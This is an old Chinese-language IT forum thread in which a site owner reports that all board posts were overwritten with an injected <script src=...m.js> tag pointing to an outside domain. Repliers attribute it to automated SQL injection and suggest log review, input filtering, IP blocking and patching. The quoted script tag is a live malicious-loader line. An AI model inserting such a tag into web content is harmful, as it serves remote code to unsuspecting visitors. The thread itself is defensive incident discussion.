討論區文章被取代成JavaScript語法!!

攻擊

phonkaii 2008-05-28 10:15:01 ‧ 5925 瀏覽

分享至

請教各位前輩先進：

如果發生這樣的事情，討論區每一篇文章內容變成...

你好本人姓黃做cnc銑床代工有<script src=http://www.dota11.cn/m.js></script>

前台的留言已經有完善的過濾機制，還是被攻擊了... >"<
我確定這是後來才被動的手腳，
因為每個人的文章都變成這樣了！每一篇！

請問這是從伺服器本身的弱點攻擊，
還是透過網頁程式呢？

看更多先前的討論...收起先前的討論...

chetbaker iT邦新手 3 級 ‧ 2008-05-28 10:22:03 檢舉

你的討論區是自己寫的，還是用open source的呢?

被攻擊的點可能有很多，不過如果你很確定前端有完善的過濾機制，那就是從AP的弱對或伺服器的弱點機率比較高。

jerry640 iT邦新手 1 級 ‧ 2008-05-28 12:33:20 檢舉

最近很多這樣的網站攻擊 SQL injection

魯大 iT邦高手 1 級 ‧ 2008-05-28 13:06:58 檢舉

又是一個SQL Injection的攻擊事件..
唉～IT人真是可憐..

davistai iT邦大師 1 級 ‧ 2008-05-31 22:23:31 檢舉

很好的例子參考 ^^

yce701116 iT邦研究生 1 級 ‧ 2008-06-01 20:37:19 檢舉

感謝大家提供答案

登入發表討論

直播研討會

{{ item.channelVendor }} {{ item.webinarstarted }} |

直播中

4 個回答

fishk

iT邦大師 1 級 ‧ 2008-05-28 10:31:52

最佳解答

這應該是SQL Injection的方式入侵的, 除了留言的程式外, 提供瀏覽的程式也要做輸入值的檢查. 將; ' " 等符號進行檢查與替換.
已被攻擊的站台, 如果Web log沒有被清除掉, 查看看log就可以看的攻擊的方式.
如果你看到攻擊字串是亂碼, 那就是Hacker使用編碼的方式攻擊.

回應
分享
檢舉

登入發表回應

lucifer666

iT邦研究生 5 級 ‧ 2008-05-28 10:25:07

十之八九是Web應用程式的弱點被打進去
你的症狀跟這陣子新聞在炒作，大陸人寫自動SQL Injection工具攻擊的狀況一樣
所以大概是你的程式有SQL injection問題

把你的 Web Server 的記錄檔調出來看看，多少能看出一點端倪
可以知道大概是哪隻程式出錯

回應 1
分享
檢舉

phonkaii iT邦新手 4 級 ‧ 2008-05-28 11:32:30 檢舉

大陸人寫自動SQL Injection工具攻擊

現在連 SQL Injection 都有自動機器人喔... = =
太可怕了吧...

登入發表回應

lcs1206

iT邦研究生 1 級 ‧ 2008-05-29 07:39:01

1.針對特定IP封死它對本機的出入口(從 Log 檔抓,來打廣告的就殺)!
2.如前輸網友所提,釜底抽薪的方法是找出哪隻網頁程式出現問題,有能力或Patch檔就修正!
3.最差的情況,暫時無方案可解只好先停掉!

回應
分享
檢舉

登入發表回應

pqr0007

iT邦研究生 1 級 ‧ 2008-05-31 18:15:25

有創意...

回應
分享
檢舉

登入發表回應

我要發表回答

立即登入回答

參賽組數

1064 組

團體組數

40 組

累計文章數

22200 篇

完賽人數

602 人

15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js

IT邦幫忙